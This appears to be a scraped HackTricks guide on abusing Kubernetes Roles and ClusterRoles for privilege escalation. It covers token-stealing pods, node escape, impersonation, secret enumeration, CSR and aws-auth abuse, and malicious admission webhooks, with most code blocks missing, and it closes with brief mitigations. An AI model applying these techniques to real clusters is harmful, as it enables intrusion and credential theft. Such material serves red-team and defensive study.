Abusing Roles/ClusterRoles in Kubernetes
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Here you can find some potentially dangerous Roles and ClusterRoles configurations.
Remember that you can get all the supported resources with kubectl api-resources
Referring as the art of getting access to a different principal within the cluster with different privileges (within the kubernetes cluster or to external clouds) than the ones you already have, in Kubernetes there are basically 4 main techniques to escalate privileges:
Be able to impersonate other user/groups/SAs with better privileges within the kubernetes cluster or to external clouds
Be able to create/patch/exec pods where you can find or attach SAs with better privileges within the kubernetes cluster or to external clouds
Be able to read secrets as the SAs tokens are stored as secrets
Be able to escape to the node from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any)
A fifth technique that deserves a mention is the ability to run port-forward in a pod, as you may be able to access interesting resources within that pod.
The wildcard (*) gives permission over any resource with any verb. It's used by admins. Inside a ClusterRole this means that an attacker could abuse anynamespace in the cluster
In RBAC, certain permissions pose significant risks:
create
: Grants the ability to create any cluster resource, risking privilege escalation.
list
: Allows listing all resources, potentially leaking sensitive data.
get
: Permits accessing secrets from service accounts, posing a security threat.
An atacker with the permissions to create a pod, could attach a privileged Service Account into the pod and steal the token to impersonate the Service Account. Effectively escalating privileges to it
Example of a pod that will steal the token of the bootstrap-signer
service account and send it to the attacker:
The following indicates all the privileges a container can have:
Privileged access (disabling protections and setting capabilities)
Disable namespaces hostIPC and hostPid that can help to escalate privileges
Disable hostNetwork namespace, giving access to steal nodes cloud privileges and better access to networks
Mount hosts / inside the container
Create the pod with:
One-liner from this tweet and with some additions:
Now that you can escape to the node check post-exploitation techniques in:
You probably want to be stealthier, in the following pages you can see what you would be able to access if you create a pod only enabling some of the mentioned privileges in the previous template:
Privileged + hostPID
Privileged only
hostPath
hostPID
hostNetwork
hostIPC
You can find example of how to create/abuse the previous privileged pods configurations in https://github.com/BishopFox/badPods
If you can create a pod (and optionally a service account) you might be able to obtain privileges in cloud environment by assigning cloud roles to a pod or a service account and then accessing it. Moreover, if you can create a pod with the host network namespace you can steal the IAM role of the node instance.
For more information check:
Pod Escape PrivilegesIt's possible to abouse these permissions to create a new pod and estalae privileges like in the previous example.
The following yaml creates a daemonset and exfiltrates the token of the SA inside the pod:
pods/exec
is a resource in kubernetes used for running commands in a shell inside a pod. This allows to run commands inside the containers or get a shell inside.
Therfore, it's possible to get inside a pod and steal the token of the SA, or enter a privileged pod, escape to the node, and steal all the tokens of the pods in the node and (ab)use the node:
This permission allows to forward one local port to one port in the specified pod. This is meant to be able to debug applications running inside a pod easily, but an attacker might abuse it to get access to interesting (like DBs) or vulnerable applications (webs?) inside a pod:
As indicated in this research, if you can access or create a pod with the hosts /var/log/
directory mounted on it, you can escape from the container.
This is basically because the when the Kube-API tries to get the logs of a container (using kubectl logs <pod>
), it requests the 0.log
file of the pod using the /logs/
endpoint of the Kubelet service.
The Kubelet service exposes the /logs/
endpoint which is just basically exposing the /var/log
filesystem of the container.
Therefore, an attacker with access to write in the /var/log/ folder of the container could abuse this behaviours in 2 ways:
Modifying the 0.log
file of its container (usually located in /var/logs/pods/namespace_pod_uid/container/0.log
) to be a symlink pointing to /etc/shadow
for example. Then, you will be able to exfiltrate hosts shadow file doing:
If the attacker controls any principal with the permissions to read nodes/log
, he can just create a symlink in /host-mounted/var/log/sym
to /
and when accessing https://<gateway>:10250/logs/sym/
he will lists the hosts root filesystem (changing the symlink can provide access to files).
A laboratory and automated exploit can be found in https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts
If you are lucky enough and the highly privileged capability capability CAP_SYS_ADMIN
is available, you can just remount the folder as rw:
As stated in this research it’s possible to bypass the protection:
Which was meant to prevent escapes like the previous ones by, instead of using a a hostPath mount, use a PersistentVolume and a PersistentVolumeClaim to mount a hosts folder in the container with writable access:
With a user impersonation privilege, an attacker could impersonate a privileged account.
Just use the parameter --as=<username>
in the kubectl
command to impersonate a user, or --as-group=<group>
to impersonate a group:
Or use the REST API:
The permission to list secrets could allow an attacker to actually read the secrets accessing the REST API endpoint:
While an attacker in possession of a token with read permissions requires the exact name of the secret to use it, unlike the broader listing secrets privilege, there are still vulnerabilities. Default service accounts in the system can be enumerated, each associated with a secret. These secrets have a name structure: a static prefix followed by a random five-character alphanumeric token (excluding certain characters) according to the source code.
The token is generated from a limited 27-character set (bcdfghjklmnpqrstvwxz2456789
), rather than the full alphanumeric range. This limitation reduces the total possible combinations to 14,348,907 (27^5). Consequently, an attacker could feasibly execute a brute-force attack to deduce the token in a matter of hours, potentially leading to privilege escalation by accessing sensitive service accounts.
If you have the verbs create
in the resource certificatesigningrequests
( or at least in certificatesigningrequests/nodeClient
). You can create a new CeSR of a new node.
According to the documentation it's possible to auto approve this requests, so in that case you don't need extra permissions. If not, you would need to be able to approve the request, which means update in certificatesigningrequests/approval
and approve
in signers
with resourceName <signerNameDomain>/<signerNamePath>
or <signerNameDomain>/*
An example of a role with all the required permissions is:
So, with the new node CSR approved, you can abuse the special permissions of nodes to steal secrets and escalate privileges.
In this post and this one the GKE K8s TLS Bootstrap configuration is configured with automatic signing and it's abused to generate credentials of a new K8s Node and then abuse those to escalate privileges by stealing secrets. If you have the mentioned privileges yo could do the same thing. Note that the first example bypasses the error preventing a new node to access secrets inside containers because a node can only access the secrets of containers mounted on it.
The way to bypass this is just to create a node credentials for the node name where the container with the interesting secrets is mounted (but just check how to do it in the first post):
Principals that can modify configmaps
in the kube-system namespace on EKS (need to be in AWS) clusters can obtain cluster admin privileges by overwriting the aws-auth configmap.
The verbs needed are update
and patch
, or create
if configmap wasn't created:
You can use aws-auth
for persistence giving access to users from other accounts.
However, aws --profile other_account eks update-kubeconfig --name <cluster-name>
doesn't work from a different acount. But actually aws --profile other_account eks get-token --cluster-name arn:aws:eks:us-east-1:123456789098:cluster/Testing
works if you put the ARN of the cluster instead of just the name.
To make kubectl
work, just make sure to configure the victims kubeconfig and in the aws exec args add --profile other_account_role
so kubectl will be using the others account profile to get the token and contact AWS.
There are 2 ways to assign K8s permissions to GCP principals. In any case the principal also needs the permission container.clusters.get
to be able to gather credentials to access the cluster, or you will need to generate your own kubectl config file (follow the next link).
When talking to the K8s api endpoint, the GCP auth token will be sent. Then, GCP, through the K8s api endpoint, will first check if the principal (by email) has any access inside the cluster, then it will check if it has any access via GCP IAM. If any of those are true, he will be responded. If not an error suggesting to give permissions via GCP IAM will be given.
Then, the first method is using GCP IAM, the K8s permissions have their equivalent GCP IAM permissions, and if the principal have it, it will be able to use it.
GCP - Container PrivescThe second method is assigning K8s permissions inside the cluster to the identifying the user by its email (GCP service accounts included).
Principals that can create TokenRequests (serviceaccounts/token
) When talking to the K8s api endpoint SAs (info from here).
Principals that can update
or patch
pods/ephemeralcontainers
can gain code execution on other pods, and potentially break out to their node by adding an ephemeral container with a privileged securityContext
Principals with any of the verbs create
, update
or patch
over validatingwebhookconfigurations
or mutatingwebhookconfigurations
might be able to create one of such webhookconfigurations in order to be able to escalate privileges.
For a mutatingwebhookconfigurations
example check this section of this post.
As you can read in the next section: Built-in Privileged Escalation Prevention, a principal cannot update neither create roles or clusterroles without having himself those new permissions. Except if he has the verb escalate
over roles
or clusterroles
.
Then he can update/create new roles, clusterroles with better permissions than the ones he has.
Principals with access to the nodes/proxy
subresource can execute code on pods via the Kubelet API (according to this). More information about Kubelet authentication in this page:
You have an example of how to get RCE talking authorized to a Kubelet API here.
Principals that can delete pods (delete
verb over pods
resource), or evict pods (create
verb over pods/eviction
resource), or change pod status (access to pods/status
) and can make other nodes unschedulable (access to nodes/status
) or delete nodes (delete
verb over nodes
resource) and has control over a pod, could steal pods from other nodes so they are executed in the compromised node and the attacker can steal the tokens from those pods.
Principals that can modify services/status
may set the status.loadBalancer.ingress.ip
field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. Most mitigations for CVE-2020-8554 only prevent ExternalIP services (according to this).
Principals with update
or patch
permissions over nodes/status
or pods/status
, could modify labels to affect scheduling constraints enforced.
Kubernetes has a built-in mechanism to prevent privilege escalation.
This system ensures that users cannot elevate their privileges by modifying roles or role bindings. The enforcement of this rule occurs at the API level, providing a safeguard even when the RBAC authorizer is inactive.
The rule stipulates that a user can only create or update a role if they possess all the permissions the role comprises. Moreover, the scope of the user's existing permissions must align with that of the role they are attempting to create or modify: either cluster-wide for ClusterRoles or confined to the same namespace (or cluster-wide) for Roles.
There is an exception to the previous rule. If a principal has the verb escalate
over roles
or clusterroles
he can increase the privileges of roles and clusterroles even without having the permissions himself.
Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. Yo cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't have already.
The privilege to create Rolebindings allows a user to bind roles to a service account. This privilege can potentially lead to privilege escalation because it allows the user to bind admin privileges to a compromised service account.
By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.
Create your .yaml
Edit your .yaml and add the uncomment lines:
See the logs of the proxy:
More info at: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/
An admission controller intercepts requests to the Kubernetes API server before the persistence of the object, but after the request is authenticated and authorized.
If an attacker somehow manages to inject a Mutationg Admission Controller, he will be able to modify already authenticated requests. Being able to potentially privesc, and more usually persist in the cluster.
Example from https://blog.rewanthtammana.com/creating-malicious-admission-controllers:
Check the status to see if it's ready:
Then deploy a new pod:
When you can see ErrImagePull
error, check the image name with either of the queries:
As you can see in the above image, we tried running image nginx
but the final executed image is rewanthtammana/malicious-image
. What just happened!!?
The ./deploy.sh
script establishes a mutating webhook admission controller, which modifies requests to the Kubernetes API as specified in its configuration lines, influencing the outcomes observed:
The above snippet replaces the first container image in every pod with rewanthtammana/malicious-image
.
Pods and Service Accounts: By default, pods mount a service account token. To enhance security, Kubernetes allows the disabling of this automount feature.
How to Apply: Set automountServiceAccountToken: false
in the configuration of service accounts or pods starting from Kubernetes version 1.6.
Selective Inclusion: Ensure that only necessary users are included in RoleBindings or ClusterRoleBindings. Regularly audit and remove irrelevant users to maintain tight security.
Roles vs. ClusterRoles: Prefer using Roles and RoleBindings for namespace-specific permissions rather than ClusterRoles and ClusterRoleBindings, which apply cluster-wide. This approach offers finer control and limits the scope of permissions.
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)